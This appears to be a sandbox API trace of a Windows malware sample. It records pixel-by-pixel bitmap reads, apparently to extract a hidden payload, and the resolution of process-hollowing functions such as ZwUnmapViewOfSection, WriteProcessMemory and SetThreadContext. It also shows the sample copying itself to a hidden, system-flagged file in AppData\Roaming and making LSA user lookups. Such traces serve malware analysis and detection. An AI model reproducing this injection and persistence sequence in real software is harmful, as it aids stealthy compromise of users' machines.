[0138.920] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.921] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.921] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=220, color=0x17e6f4) returned 0x0
[0138.921] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.921] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.921] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=221, color=0x17e6f4) returned 0x0
[0138.921] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.921] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.921] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=222, color=0x17e6f4) returned 0x0
[0138.921] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.921] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.921] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=223, color=0x17e6f4) returned 0x0
[0138.921] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.921] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.921] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=224, color=0x17e6f4) returned 0x0
[0138.921] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.921] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.922] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=225, color=0x17e6f4) returned 0x0
[0138.922] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.922] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.922] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=226, color=0x17e6f4) returned 0x0
[0138.922] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.922] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.922] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=227, color=0x17e6f4) returned 0x0
[0138.922] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.922] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.922] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=228, color=0x17e6f4) returned 0x0
[0138.922] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.922] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.922] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=229, color=0x17e6f4) returned 0x0
[0138.922] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.922] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.922] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=230, color=0x17e6f4) returned 0x0
[0138.923] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.923] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.923] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=231, color=0x17e6f4) returned 0x0
[0138.923] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.923] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.923] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=232, color=0x17e6f4) returned 0x0
[0138.923] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.923] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.923] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=233, color=0x17e6f4) returned 0x0
[0138.923] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.923] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.923] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=234, color=0x17e6f4) returned 0x0
[0138.923] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.923] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.923] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=235, color=0x17e6f4) returned 0x0
[0138.924] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.924] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.924] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=236, color=0x17e6f4) returned 0x0
[0138.924] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.924] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.924] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=237, color=0x17e6f4) returned 0x0
[0138.924] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.924] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.924] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=238, color=0x17e6f4) returned 0x0
[0138.924] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.924] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.924] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=239, color=0x17e6f4) returned 0x0
[0138.924] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.924] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.924] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=240, color=0x17e6f4) returned 0x0
[0138.924] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.925] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.925] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=241, color=0x17e6f4) returned 0x0
[0138.925] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.925] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.925] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=242, color=0x17e6f4) returned 0x0
[0138.925] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.926] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.926] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=243, color=0x17e6f4) returned 0x0
[0138.926] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.926] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.926] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=244, color=0x17e6f4) returned 0x0
[0138.926] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.926] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.926] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=245, color=0x17e6f4) returned 0x0
[0138.926] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.927] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.927] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=246, color=0x17e6f4) returned 0x0
[0138.927] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.927] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.927] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=247, color=0x17e6f4) returned 0x0
[0138.927] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=248, color=0x17e6f4) returned 0x0
[0138.953] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0139.205] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x82400, lpName=0x0) returned 0x264
[0139.206] memcpy (in: _Dst=0x340000, _Src=0x42c0af0, _Size=0x82400 | out: _Dst=0x340000) returned 0x340000
[0139.215] CloseHandle (hObject=0x264) returned 1
[0140.847] CoTaskMemAlloc (cb=0xd) returned 0x6cbfc8
[0140.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=8, lpMultiByteStr=0x28f4aac, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 8
[0140.847] LoadLibraryA (lpLibFileName="kernel32") returned 0x752b0000
[0140.848] CoTaskMemFree (pv=0x6cbfc8)
[0140.868] CoTaskMemAlloc (cb=0x11) returned 0x6aaa08
[0140.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ResumeThread", cchWideChar=12, lpMultiByteStr=0x28f4de8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ResumeThread", lpUsedDefaultChar=0x0) returned 12
[0140.869] GetProcAddress (hModule=0x752b0000, lpProcName="ResumeThread") returned 0x752c43a7
[0140.869] CoTaskMemFree (pv=0x6aaa08)
[0140.926] CoTaskMemAlloc (cb=0xd) returned 0x6cbfe0
[0140.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=8, lpMultiByteStr=0x28f55cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 8
[0140.926] LoadLibraryA (lpLibFileName="kernel32") returned 0x752b0000
[0140.927] CoTaskMemFree (pv=0x6cbfe0)
[0140.927] CoTaskMemAlloc (cb=0x1a) returned 0x6b8060
[0140.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Wow64SetThreadContext", cchWideChar=21, lpMultiByteStr=0x28f5604, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Wow64SetThreadContext", lpUsedDefaultChar=0x0) returned 21
[0140.927] GetProcAddress (hModule=0x752b0000, lpProcName="Wow64SetThreadContext") returned 0x75345933
[0140.927] CoTaskMemFree (pv=0x6b8060)
[0140.941] CoTaskMemAlloc (cb=0xd) returned 0x6cbfc8
[0140.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=8, lpMultiByteStr=0x28f56d0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 8
[0140.942] LoadLibraryA (lpLibFileName="kernel32") returned 0x752b0000
[0140.942] CoTaskMemFree (pv=0x6cbfc8)
[0140.942] CoTaskMemAlloc (cb=0x15) returned 0x6aaa08
[0140.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SetThreadContext", cchWideChar=16, lpMultiByteStr=0x28f5708, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetThreadContext", lpUsedDefaultChar=0x0) returned 16
[0140.942] GetProcAddress (hModule=0x752b0000, lpProcName="SetThreadContext") returned 0x75345933
[0140.942] CoTaskMemFree (pv=0x6aaa08)
[0140.948] CoTaskMemAlloc (cb=0xd) returned 0x6cbfc8
[0140.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=8, lpMultiByteStr=0x28f57d0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 8
[0140.948] LoadLibraryA (lpLibFileName="kernel32") returned 0x752b0000
[0140.949] CoTaskMemFree (pv=0x6cbfc8)
[0140.949] CoTaskMemAlloc (cb=0x1a) returned 0x6b8060
[0140.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Wow64GetThreadContext", cchWideChar=21, lpMultiByteStr=0x28f5808, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Wow64GetThreadContext", lpUsedDefaultChar=0x0) returned 21
[0140.949] GetProcAddress (hModule=0x752b0000, lpProcName="Wow64GetThreadContext") returned 0x752e799c
[0140.949] CoTaskMemFree (pv=0x6b8060)
[0140.956] CoTaskMemAlloc (cb=0xd) returned 0x6cbfc8
[0140.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=8, lpMultiByteStr=0x28f58d4, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 8
[0140.956] LoadLibraryA (lpLibFileName="kernel32") returned 0x752b0000
[0140.957] CoTaskMemFree (pv=0x6cbfc8)
[0140.957] CoTaskMemAlloc (cb=0x15) returned 0x6aaa08
[0140.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetThreadContext", cchWideChar=16, lpMultiByteStr=0x28f590c, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThreadContext", lpUsedDefaultChar=0x0) returned 16
[0140.957] GetProcAddress (hModule=0x752b0000, lpProcName="GetThreadContext") returned 0x752e799c
[0140.957] CoTaskMemFree (pv=0x6aaa08)
[0140.963] CoTaskMemAlloc (cb=0xd) returned 0x6cbfc8
[0140.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=8, lpMultiByteStr=0x28f59c8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 8
[0140.963] LoadLibraryA (lpLibFileName="kernel32") returned 0x752b0000
[0140.964] CoTaskMemFree (pv=0x6cbfc8)
[0140.964] CoTaskMemAlloc (cb=0x13) returned 0x6aaba8
[0140.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VirtualAllocEx", cchWideChar=14, lpMultiByteStr=0x28f5a00, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VirtualAllocEx", lpUsedDefaultChar=0x0) returned 14
[0140.964] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualAllocEx") returned 0x752dd980
[0140.964] CoTaskMemFree (pv=0x6aaba8)
[0140.982] CoTaskMemAlloc (cb=0xd) returned 0x6cbfe0
[0140.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=8, lpMultiByteStr=0x28f5abc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 8
[0140.982] LoadLibraryA (lpLibFileName="kernel32") returned 0x752b0000
[0140.982] CoTaskMemFree (pv=0x6cbfe0)
[0140.982] CoTaskMemAlloc (cb=0x17) returned 0x6aaa08
[0140.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteProcessMemory", cchWideChar=18, lpMultiByteStr=0x28f5af4, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteProcessMemory", lpUsedDefaultChar=0x0) returned 18
[0140.983] GetProcAddress (hModule=0x752b0000, lpProcName="WriteProcessMemory") returned 0x752dd9b0
[0140.983] CoTaskMemFree (pv=0x6aaa08)
[0140.998] CoTaskMemAlloc (cb=0xd) returned 0x6cbfc8
[0140.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=8, lpMultiByteStr=0x28f5bb8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 8
[0140.998] LoadLibraryA (lpLibFileName="kernel32") returned 0x752b0000
[0140.999] CoTaskMemFree (pv=0x6cbfc8)
[0140.999] CoTaskMemAlloc (cb=0x16) returned 0x6aaba8
[0140.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ReadProcessMemory", cchWideChar=17, lpMultiByteStr=0x28f5bf0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadProcessMemory", lpUsedDefaultChar=0x0) returned 17
[0140.999] GetProcAddress (hModule=0x752b0000, lpProcName="ReadProcessMemory") returned 0x752dcfa4
[0140.999] CoTaskMemFree (pv=0x6aaba8)
[0141.016] CoTaskMemAlloc (cb=0xa) returned 0x6cbfe0
[0141.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ntdll", cchWideChar=5, lpMultiByteStr=0x28f5cb0, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntdll", lpUsedDefaultChar=0x0) returned 5
[0141.017] LoadLibraryA (lpLibFileName="ntdll") returned 0x76f00000
[0141.017] CoTaskMemFree (pv=0x6cbfe0)
[0141.017] CoTaskMemAlloc (cb=0x19) returned 0x6b8060
[0141.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ZwUnmapViewOfSection", cchWideChar=20, lpMultiByteStr=0x28f5cdc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZwUnmapViewOfSection", lpUsedDefaultChar=0x0) returned 20
[0141.017] GetProcAddress (hModule=0x76f00000, lpProcName="ZwUnmapViewOfSection") returned 0x76f1fc70
[0141.018] CoTaskMemFree (pv=0x6b8060)
[0141.030] CoTaskMemAlloc (cb=0xd) returned 0x6cbfe0
[0141.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=8, lpMultiByteStr=0x28f5da4, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 8
[0141.030] LoadLibraryA (lpLibFileName="kernel32") returned 0x752b0000
[0141.031] CoTaskMemFree (pv=0x6cbfe0)
[0141.031] CoTaskMemAlloc (cb=0x13) returned 0x6aaba8
[0141.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateProcessA", cchWideChar=14, lpMultiByteStr=0x28f5ddc, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateProcessA", lpUsedDefaultChar=0x0) returned 14
[0141.031] GetProcAddress (hModule=0x752b0000, lpProcName="CreateProcessA") returned 0x752c1072
[0141.031] CoTaskMemFree (pv=0x6aaba8)
[0141.221] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", nBufferLength=0x105, lpBuffer=0x17dc4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", lpFilePart=0x0) returned 0x5f
[0141.241] CoTaskMemAlloc (cb=0x20c) returned 0x6d16b0
[0141.241] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6d16b0 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x0
[0141.242] CoTaskMemFree (pv=0x6d16b0)
[0141.242] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x17dc44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming", lpFilePart=0x0) returned 0x22
[0141.320] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe", nBufferLength=0x105, lpBuffer=0x17dcc4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe", lpFilePart=0x0) returned 0x33
[0141.320] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x17df04) returned 1
[0141.321] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\nfxioujoilco.exe"), fInfoLevelId=0x0, lpFileInformation=0x17e1c8 | out: lpFileInformation=0x17e1c8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0141.321] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x17df00) returned 1
[0141.358] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe", nBufferLength=0x105, lpBuffer=0x17dc54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe", lpFilePart=0x0) returned 0x33
[0141.410] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe", nBufferLength=0x105, lpBuffer=0x17dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe", lpFilePart=0x0) returned 0x33
[0141.420] SetNamedSecurityInfoW () returned 0x2
[0141.879] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", nBufferLength=0x105, lpBuffer=0x17dc7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", lpFilePart=0x0) returned 0x5f
[0141.879] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe", nBufferLength=0x105, lpBuffer=0x17dc7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe", lpFilePart=0x0) returned 0x33
[0141.880] CopyFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\nfxioujoilco.exe"), bFailIfExists=1) returned 1
[0141.992] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe", nBufferLength=0x105, lpBuffer=0x17dc24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe", lpFilePart=0x0) returned 0x33
[0142.002] GetUserNameW (in: lpBuffer=0x17dee0, pcbBuffer=0x17e158 | out: lpBuffer="kEecfMwgj", pcbBuffer=0x17e158) returned 1
[0142.041] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe", dwFileAttributes=0x2007) returned 1
[0142.060] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x17df70, DesiredAccess=0x800, PolicyHandle=0x17df30 | out: PolicyHandle=0x17df30) returned 0x0
[0142.065] CoTaskMemAlloc (cb=0x8) returned 0x6d1130
[0142.078] CoTaskMemAlloc (cb=0x14) returned 0x6aaba8
[0142.080] LsaLookupNames2 (in: PolicyHandle=0x6aa8a8, Flags=0x0, Count=0x1, Names="kEecfMwgj", ReferencedDomains=0x17df44, Sids=0x17df38 | out: ReferencedDomains=0x17df44, Sids=0x17df38) returned 0x0
[0142.083] CoTaskMemFree (pv=0x6aaba8)
[0142.083] CoTaskMemFree (pv=0x6d1130)
[0142.099] LsaClose (ObjectHandle=0x6aa8a8) returned 0x0
[0142.099] LsaFreeMemory (Buffer=0x68f440) returned 0x0
[0142.099] LsaFreeMemory (Buffer=0x65f5f0) returned 0x0
[0142.101] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x17df70, DesiredAccess=0x800, PolicyHandle=0x17df30 | out: PolicyHandle=0x17df30) returned 0x0
[0142.101] CoTaskMemAlloc (cb=0x8) returned 0x6d1130
[0142.101] CoTaskMemAlloc (cb=0x14) returned 0x6aaba8
[0142.102] LsaLookupNames2 (in: PolicyHandle=0x6aa8a8, Flags=0x0, Count=0x1, Names="kEecfMwgj", ReferencedDomains=0x17df44, Sids=0x17df38 | out: ReferencedDomains=0x17df44, Sids=0x17df38) returned 0x0
[0142.102] CoTaskMemFree (pv=0x6aaba8)
[0142.102] CoTaskMemFree (pv=0x6d1130)
[0142.102] LsaClose (ObjectHandle=0x6aa8a8) returned 0x0
[0142.103] LsaFreeMemory (Buffer=0x68f440) returned 0x0
[0142.103] LsaFreeMemory (Buffer=0x65f5f0) returned 0x0
[0142.106] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x17df70, DesiredAccess=0x800, PolicyHandle=0x17df30 | out: PolicyHandle=0x17df30) returned 0x0
[0142.107] CoTaskMemAlloc (cb=0x8) returned 0x6d1130
[0142.107] CoTaskMemAlloc (cb=0x14) returned 0x6aaba8
[0142.108] LsaLookupNames2 (in: PolicyHandle=0x6aa8a8, Flags=0x0, Count=0x1, Names="kEecfMwgj", ReferencedDomains=0x17df44, Sids=0x17df38 | out: ReferencedDomains=0x17df44, Sids=0x17df38) returned 0x0
[0142.108] CoTaskMemFree (pv=0x6aaba8)
[0142.108] CoTaskMemFree (pv=0x6d1130)
[0142.108] LsaClose (ObjectHandle=0x6aa8a8) returned 0x0
[0142.109] LsaFreeMemory (Buffer=0x68f440) returned 0x0
[0142.109] LsaFreeMemory (Buffer=0x65f5f0) returned 0x0
[0142.111] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x17df70, DesiredAccess=0x800, PolicyHandle=0x17df30 | out: PolicyHandle=0x17df30) returned 0x0
[0142.111] CoTaskMemAlloc (cb=0x8) returned 0x6d1130
[0142.111] CoTaskMemAlloc (cb=0x14) returned 0x6aaba8
[0142.111] LsaLookupNames2 (in: PolicyHandle=0x6aa8a8, Flags=0x0, Count=0x1, Names="kEecfMwgj", ReferencedDomains=0x17df44, Sids=0x17df38 | out: ReferencedDomains=0x17df44, Sids=0x17df38) returned 0x0
[0142.112] CoTaskMemFree (pv=0x6aaba8)
[0142.112] CoTaskMemFree (pv=0x6d1130)
[0142.112] LsaClose (ObjectHandle=0x6aa8a8) returned 0x0
[0142.113] LsaFreeMemory (Buffer=0x68f440) returned 0x0
[0142.113] LsaFreeMemory (Buffer=0x65f5f0) returned 0x0
[0142.115] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x17df70, DesiredAccess=0x800, PolicyHandle=0x17df30 | out: PolicyHandle=0x17df30) returned 0x0
[0142.116] CoTaskMemAlloc (cb=0x8) returned 0x6d1130
[0142.116] CoTaskMemAlloc (cb=0x14) returned 0x6aaba8
[0142.116] LsaLookupNames2 (in: PolicyHandle=0x6aa8a8, Flags=0x0, Count=0x1, Names="kEecfMwgj", ReferencedDomains=0x17df44, Sids=0x17df38 | out: ReferencedDomains=0x17df44, Sids=0x17df38) returned 0x0
[0142.117] CoTaskMemFree (pv=0x6aaba8)
[0142.117] CoTaskMemFree (pv=0x6d1130)
[0142.117] LsaClose (ObjectHandle=0x6aa8a8) returned 0x0
[0142.117] LsaFreeMemory (Buffer=0x68f440) returned 0x0
[0142.117] LsaFreeMemory (Buffer=0x65f5f0) returned 0x0
[0142.118] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x17df70, DesiredAccess=0x800, PolicyHandle=0x17df30 | out: PolicyHandle=0x17df30) returned 0x0
[0142.119] CoTaskMemAlloc (cb=0x8) returned 0x6d1130
[0142.119] CoTaskMemAlloc (cb=0x14) returned 0x6aaba8
[0142.119] LsaLookupNames2 (in: PolicyHandle=0x6aa8a8, Flags=0x0, Count=0x1, Names="kEecfMwgj", ReferencedDomains=0x17df44, Sids=0x17df38 | out: ReferencedDomains=0x17df44, Sids=0x17df38) returned 0x0
[0142.120] CoTaskMemFree (pv=0x6aaba8)
[0142.120] CoTaskMemFree (pv=0x6d1130)
[0142.120] LsaClose (ObjectHandle=0x6aa8a8) returned 0x0
[0142.120] LsaFreeMemory (Buffer=0x68f440) returned 0x0
[0142.121] LsaFreeMemory (Buffer=0x65f5f0) returned 0x0
